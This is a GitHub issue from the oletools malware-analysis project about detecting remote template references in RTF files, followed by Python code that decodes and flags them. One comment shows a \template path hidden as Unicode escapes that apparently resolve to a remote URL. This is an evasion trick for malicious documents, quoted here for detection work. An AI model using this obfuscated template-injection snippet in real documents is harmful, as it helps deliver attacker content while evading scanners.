decalage2 / oletools

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
http://www.decalage.info/python/oletools

rtfobj: detect remote templates #736

Open decalage2 opened 2 years ago

decalage2 commented 2 years ago

See https://twitter.com/VessOnSecurity/status/1489235792832704519
PoC from @bontchev: http://bontchev.my.contact.bg/poc.rtf

The remote template URL is in a \template control word:

[screenshot not included]

bontchev commented 2 years ago

Note that the template path could be Unicode-encoded, e.g.,

{\*\template \u-65432?\u-65420?\u-65420?\u-65424?\u-65478?\u-65489?\u-65489?\u-65487?\u-65480?\u-65480?\u-65490?\u-65486?\u-65487?\u-65484?\u-65490?\u-65487?\u-65485?\u-65484?\u-65490?\u-65487?\u-65487?\u-65482?\u-65489?\u-65459?\u-65431?\u-65437?\u-65422?\u-65425?\u-65421?\u-65425?\u-65434?\u-65420?\u-65504?\u-65449?\u-65425?\u-65422?\u-65436?\u-65504?\u-65452?\u-65435?\u-65427?\u-65424?\u-65428?\u-65439?\u-65420?\u-65435?\u-65490?\u-65436?\u-65425?\u-65437?\u-65416?}
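The thread shows the `\template` path carried either as plain text or as `\uN` escapes (RTF also allows `\'hh` byte escapes, and `\ucN` controls how many fallback characters follow each `\uN`). The following is an added standalone Python example, not rtfobj's or oletools' own code: it finds every `\template` destination group in an RTF file, decodes those escapes, and flags paths that point outside the document. The escaped group is the one bontchev posted above; the `example.invalid` hosts, the `C:\Users\x` path and all function names are constructed for illustration.

```python
import re

# Tokenizer for the body of an RTF group. Alternatives, in order:
#   \uN     Unicode code point (signed 16-bit), optional space delimiter
#   \'hh    one byte in the document's code page (cp1252 assumed here)
#   \wordN  any other control word with optional numeric parameter
#   \c      control symbol (\\ \{ \} \* ...)
#   { }     group delimiters
#   text    a run of plain characters
TOKEN_RE = re.compile(
    rb"\\u(-?\d+) ?"
    rb"|\\'([0-9A-Fa-f]{2})"
    rb"|\\([A-Za-z]+)(-?\d+)? ?"
    rb"|\\(.)"
    rb"|([{}])"
    rb"|([^\\{}]+)",
    re.DOTALL,
)
# Opening of a \template destination, with or without the \* ignorable marker.
TEMPLATE_START_RE = re.compile(rb"\{(?:\\\*)?\\template(?![A-Za-z0-9-])")
# URL scheme or UNC path: anything Word would fetch from outside the document.
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://|\\\\)", re.IGNORECASE)


def group_at(data: bytes, start: int) -> bytes:
    """Return the group whose '{' is at data[start], honouring nesting and
    skipping escaped characters so \\{ and \\} do not change the depth."""
    depth, i = 0, start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":
            i += 2  # skip the escaped character / control symbol
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            depth -= 1
            if depth == 0:
                return data[start:i + 1]
        i += 1
    return data[start:]  # unterminated group: keep the remainder


def decode_rtf_text(group: bytes) -> str:
    """Decode the text of an RTF group: resolves \\uN and \\'hh escapes and honours
    \\ucN (how many fallback characters follow each \\uN and must be dropped).
    Control words contribute no text, so a whole \\template group can be passed in."""
    out, uc, skip = [], 1, 0  # RTF default: one fallback character per \uN
    for m in TOKEN_RE.finditer(group):
        ucode, hexbyte, word, param, sym, _brace, text = m.groups()
        if ucode is not None:
            code = int(ucode)
            if code < 0:
                code += 0x10000  # signed 16-bit parameter: -65432 -> 104 ('h')
            out.append(chr(code))
            skip = uc
        elif hexbyte is not None:
            if skip:
                skip -= 1  # a \'hh escape counts as one fallback character
            else:
                out.append(bytes.fromhex(hexbyte.decode()).decode("cp1252", "replace"))
        elif word is not None:
            if word == b"uc" and param is not None:
                uc = int(param)
        elif sym is not None:
            if skip:
                skip -= 1
            elif sym in (b"\\", b"{", b"}"):
                out.append(sym.decode())
        elif text is not None:
            t = text.decode("ascii", "replace").replace("\r", "").replace("\n", "")
            n = min(skip, len(t))
            out.append(t[n:])
            skip -= n
    return "".join(out)


def find_templates(rtf: bytes) -> list[tuple[str, bool]]:
    """Return (decoded template path, is_remote) for every \\template group."""
    found = []
    for m in TEMPLATE_START_RE.finditer(rtf):
        path = decode_rtf_text(group_at(rtf, m.start())).strip()
        found.append((path, bool(REMOTE_RE.match(path))))
    return found


# Constructed test documents (not real malware). SAMPLE_UNICODE wraps the escaped
# \template group from this thread in a minimal RTF header; the other hosts and
# paths are hypothetical.
SAMPLE_UNICODE = (
    rb"{\rtf1\ansi{\*\template \u-65432?\u-65420?\u-65420?\u-65424?\u-65478?"
    rb"\u-65489?\u-65489?\u-65487?\u-65480?\u-65480?\u-65490?\u-65486?\u-65487?"
    rb"\u-65484?\u-65490?\u-65487?\u-65485?\u-65484?\u-65490?\u-65487?\u-65487?"
    rb"\u-65482?\u-65489?\u-65459?\u-65431?\u-65437?\u-65422?\u-65425?\u-65421?"
    rb"\u-65425?\u-65434?\u-65420?\u-65504?\u-65449?\u-65425?\u-65422?\u-65436?"
    rb"\u-65504?\u-65452?\u-65435?\u-65427?\u-65424?\u-65428?\u-65439?\u-65420?"
    rb"\u-65435?\u-65490?\u-65436?\u-65425?\u-65437?\u-65416?}\par}"
)
SAMPLE_PLAIN = rb"{\rtf1\ansi{\*\template http://example.invalid/t.dotx}\par}"
SAMPLE_HEX = rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70://example.invalid/t.dotx}\par}"
SAMPLE_UC0 = rb"{\rtf1\ansi{\*\template\uc0\u104\u116\u116\u112://example.invalid/x.dotx}\par}"
SAMPLE_LOCAL = rb"{\rtf1\ansi{\*\template C:\\Users\\x\\Normal.dotm}\par}"

if __name__ == "__main__":
    for name, doc in [("unicode", SAMPLE_UNICODE), ("plain", SAMPLE_PLAIN),
                      ("hex", SAMPLE_HEX), ("uc0", SAMPLE_UC0), ("local", SAMPLE_LOCAL)]:
        for path, remote in find_templates(doc):
            print(f"{name:8} remote={remote!s:5} {path}")
```

Caveats a detector built on this would need to address: `\binN` data is not skipped, so binary blobs containing braces can confuse the group scanner; `\'hh` bytes are decoded as cp1252 regardless of the document's `\ansicpg`; and a path that decodes to a bare hostname or a `file:` URL is treated as remote by the scheme check, which is the conservative choice for triage.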